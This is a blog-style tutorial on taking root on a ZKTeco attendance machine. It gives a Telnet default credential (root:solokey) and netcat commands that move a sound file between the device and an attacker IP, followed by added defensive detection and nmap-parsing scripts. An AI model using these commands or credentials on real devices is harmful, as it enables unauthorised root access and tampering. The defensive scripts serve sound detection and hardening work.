What is the very first thought that comes to your mind when you see an Attendance Machine??
Whether you are a student or a professional, the very first thought is "Why? Why me, God…" Was there even a need for the so-called Office Attendance Machines…??!! The one thing which follows us like our shadow is not our soul mate, twin flame and all that, but this Attendance machine… Chillax!! IoT devices can be hacked in minutes. Today we are going to hack into one such device – the ZKTeco Office Attendance Machine…
Welcome to the realm of Hacking… The future of hacking lies in IoT hacking. Just as the internet connects people, the Internet of Things connects devices and helps them communicate.
Today, we will gain access to this Attendance machine and change its normal behaviour.
So, let's find out whether this “Smart” device is actually smart or not..? 😉 In just ten simple steps. Yes…!! You heard it right: in just ten steps we will hack into the system, and the smartness of the device will be in a crunch.. 😀
The first step is to scan the network and find the IP of the device. For this, you can use nmap or Zenmap.
Here we are using nmap. The attacker's IP is 192.168.1.58 and the victim's IP is 192.168.1.101.
Now we will do port scanning on the victim's IP. Port scanning is a technique through which we can find the open ports and target the victim.
Command: nmap -sV -p- 192.168.1.101 (victim's IP)
From the output of the above command, we found that the Telnet port is open,
i.e. port 23.
In the second step, we will try to connect over Telnet using default passwords.
Here is a list of Telnet default passwords.. 😉
One of the combinations which worked for us is root:solokey.
The third step is to check our privileges.
Command to check the current user: id
The output of the above command shows that we are root.
Now, in the fourth step, we will check the running processes to find a process useful to us.
The command ps is used to list running processes.
Through this, we found an unusual process: /mnt/mtdblock/main
The fifth step is to get into /mnt/mtdblock.
In /mnt/mtdblock, we found options.cfg, which looks like a configuration file. What are we waiting for..?? Let's dig into it.
Command: cat file_name. Here: cat options.cfg
The sixth step is to dig into the configuration file.
Here we found some public IPs, ports and user configurations.
It's time to play.
Command: cd wav
In the seventh step, we found the wav sound file. This will help us further in changing the behaviour of the smart machine.
Now, through netcat, we will transfer the E_0.wav file.
To do that, we started a netcat listener on port 4444 on the attacker's system. We need to redirect the output of the listener into E_0.wav because when we transfer a file via netcat, it only carries the data in raw form.
Here is the wav file which we got from the victim's system. The monotonous sound of “Thank You” … :((
Command: ncat -lvnp 4444 > E_0.wav
Let's get rid of this boring “Thank You” sound.. Let's play with the machine..!!! 😉
Now, in the eighth step, we will send the file from the victim machine to the attacker's system. To do that, use the following command on the victim system, giving the E_0.wav file as input.
nc 192.168.1.58 4444 < E_0.wav
Now we have fetched the file on the attacker's system. We will use the dir command to check the file size.
So, now we will generate a custom wav file.. 😉
In step number nine, we will generate a custom wav file. For that we will use a free online website to generate a wav file from text, and then rename it to E_0.wav. Let's remove the original file from the victim machine using the rm command. Now we will start a netcat listener on the victim machine on port 4444 and save the output of the listener into the wav file.
Command: nc -lp 4444 > E_0.wav
The tenth and final step is to send our new E_0.wav to the victim machine using the following command.
ncat 192.168.1.101 4444 < E_0.wav
And bingo, we have changed the sound of the Attendance machine.
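From the defender's side, the whole walkthrough leaves two things in the network logs: a Telnet session to a device that should never be managed over Telnet, and raw netcat connections on an unusual port (4444 above) to and from that device. The following script is an added example, not part of the original article: it runs a simple detection over constructed connection-log lines in an assumed key=value format (proto/src/dst/dport/bytes). The asset inventory IOT_HOSTS, the allowlist ALLOWED_IOT_PORTS and the sample log are assumptions made for the example; the addresses mirror the walkthrough.

```python
import re
from typing import Dict, List, Tuple

# Constructed sample connection log in an assumed key=value format (not from
# the article). 192.168.1.58 is the workstation that opened the session and
# 192.168.1.101 the attendance machine, as in the walkthrough.
SAMPLE_LOG = """\
2024-03-01T09:00:01 proto=tcp src=192.168.1.58 dst=192.168.1.101 dport=23 bytes=812
2024-03-01T09:00:07 proto=tcp src=192.168.1.101 dst=192.168.1.58 dport=4444 bytes=88200
2024-03-01T09:01:30 proto=tcp src=192.168.1.58 dst=192.168.1.101 dport=4444 bytes=90112
2024-03-01T09:02:00 proto=tcp src=192.168.1.20 dst=192.168.1.5 dport=443 bytes=1200
2024-03-01T09:02:05 proto=tcp src=192.168.1.101 dst=192.168.1.5 dport=123 bytes=96
"""

# Assumed asset inventory: the attendance machines on the LAN.
IOT_HOSTS = {"192.168.1.101"}
# Assumed allowlist of ports an attendance machine is expected to use
# (web UI and NTP here); anything outside it deserves a look.
ALLOWED_IOT_PORTS = {80, 443, 123}

LINE_RE = re.compile(
    r"^(?P<ts>\S+) proto=(?P<proto>\w+) src=(?P<src>[\d.]+) "
    r"dst=(?P<dst>[\d.]+) dport=(?P<dport>\d+) bytes=(?P<bytes>\d+)$"
)


def parse_log(text: str) -> List[Dict[str, str]]:
    """Turn key=value lines into dicts; lines that do not match the format are skipped."""
    records = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            records.append(m.groupdict())
    return records


def find_alerts(records: List[Dict[str, str]],
                iot_hosts=IOT_HOSTS,
                allowed=ALLOWED_IOT_PORTS) -> List[Tuple[str, str]]:
    """Return (rule, timestamp) pairs for the behaviours the walkthrough relies on."""
    alerts = []
    for r in records:
        dport = int(r["dport"])
        if r["dst"] in iot_hosts and dport == 23:
            # Telnet management session to a device that should not be managed over Telnet.
            alerts.append(("telnet-to-iot-device", r["ts"]))
        elif r["src"] in iot_hosts and dport not in allowed:
            # Device reaching out on an unexpected port: the raw file transfer (nc ... < file).
            alerts.append(("iot-unexpected-outbound", r["ts"]))
        elif r["dst"] in iot_hosts and dport not in allowed:
            # Unexpected inbound port on the device: a listener (nc -lp) was started on it.
            alerts.append(("iot-unexpected-inbound", r["ts"]))
    return alerts


if __name__ == "__main__":
    for rule, ts in find_alerts(parse_log(SAMPLE_LOG)):
        print(f"{ts}  {rule}")
```

On the sample log this raises three alerts in order: the Telnet session, the device pushing the original wav out on port 4444, and the replacement wav being pushed back in on port 4444. The workstation's ordinary HTTPS traffic and the device's NTP request are ignored because the allowlist covers them; keeping that allowlist per device type is what keeps the rule quiet on a real network.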
Impact of IoT device hacking
- In this case, we directly get root access, meaning we can take full control over the device.
- If the attacker reaches the router's IP through such a so-called smart device (cameras, attendance machines, smart televisions), he can easily gain the router's credentials through a rainbow table tool.
- Once the attacker has access to the router, the whole network is under the attacker's control.
Solution to keep intruders away
- If you are using the same device at your school, university or workplace, the solution to keep hackers/attackers away is to change the default password of telnet.
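Before the default password can be changed, an administrator needs to know which devices on the network still expose Telnet at all. The same nmap scan from step one, saved in greppable form (nmap -sV -p- -oG), gives that inventory. The script below is an added example, not part of the original article: it parses a constructed sample of nmap greppable output (the hosts, ports and version strings in it are invented for the example) and lists the hosts with TCP/23 open so they can be fixed first.

```python
import re
from typing import Dict, List

# Constructed sample of nmap greppable output (nmap -sV -p- -oG -), not a real
# scan from the article. Each port entry follows nmap's
# port/state/protocol/owner/service/rpc/version layout.
SAMPLE_GNMAP = """\
# Nmap 7.94 scan initiated (constructed sample)
Host: 192.168.1.101 ()\tStatus: Up
Host: 192.168.1.101 ()\tPorts: 23/open/tcp//telnet//BusyBox telnetd/, 80/open/tcp//http///\tIgnored State: closed (65533)
Host: 192.168.1.5 ()\tStatus: Up
Host: 192.168.1.5 ()\tPorts: 443/open/tcp//https//nginx/\tIgnored State: closed (65534)
Host: 192.168.1.20 ()\tStatus: Up
Host: 192.168.1.20 ()\tPorts: 22/open/tcp//ssh//OpenSSH 8.9/, 23/closed/tcp//telnet///\tIgnored State: filtered (65533)
# Nmap done
"""

# Only lines carrying a "Ports:" field matter; the "Status: Up" lines are skipped.
HOST_RE = re.compile(
    r"^Host:\s+(?P<ip>[\d.]+)\s+\((?P<name>[^)]*)\)\s+Ports:\s+(?P<ports>.*?)"
    r"(?:\s+Ignored State:.*)?$"
)


def parse_gnmap(text: str) -> Dict[str, List[dict]]:
    """Map each IP to its list of port entries (port, state, proto, service, version)."""
    hosts: Dict[str, List[dict]] = {}
    for line in text.splitlines():
        m = HOST_RE.match(line)
        if not m:
            continue
        entries = []
        for item in m.group("ports").split(","):
            fields = item.strip().split("/")
            if len(fields) < 7:
                continue  # malformed entry; ignore rather than guess
            port, state, proto, _owner, service, _rpc, version = fields[:7]
            entries.append({
                "port": int(port),
                "state": state,
                "proto": proto,
                "service": service,
                "version": version,
            })
        hosts[m.group("ip")] = entries
    return hosts


def telnet_exposed(hosts: Dict[str, List[dict]]) -> List[str]:
    """IPs with TCP/23 open: the precondition for the default-credential login in the article."""
    return sorted(
        ip for ip, entries in hosts.items()
        if any(e["port"] == 23 and e["state"] == "open" and e["proto"] == "tcp"
               for e in entries)
    )


def remediation_report(hosts: Dict[str, List[dict]]) -> List[str]:
    """One line per exposed host, with the banner nmap saw, for the to-do list."""
    lines = []
    for ip in telnet_exposed(hosts):
        banner = next(e["version"] for e in hosts[ip] if e["port"] == 23) or "unknown"
        lines.append(f"{ip}: telnet open ({banner}) -> change default password")
    return lines


if __name__ == "__main__":
    for line in remediation_report(parse_gnmap(SAMPLE_GNMAP)):
        print(line)
```

In the sample, only 192.168.1.101 is reported: 192.168.1.20 has port 23 closed, and 192.168.1.5 does not listen on it at all. Re-running the scan after the passwords have been changed confirms nothing new has appeared, which is the check a practitioner would keep in a scheduled job rather than run once.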
Note: “This is for educational purposes only”. Exploiting this can land you in legal trouble. Always choose to learn and help others rather than landing in any kind of felony.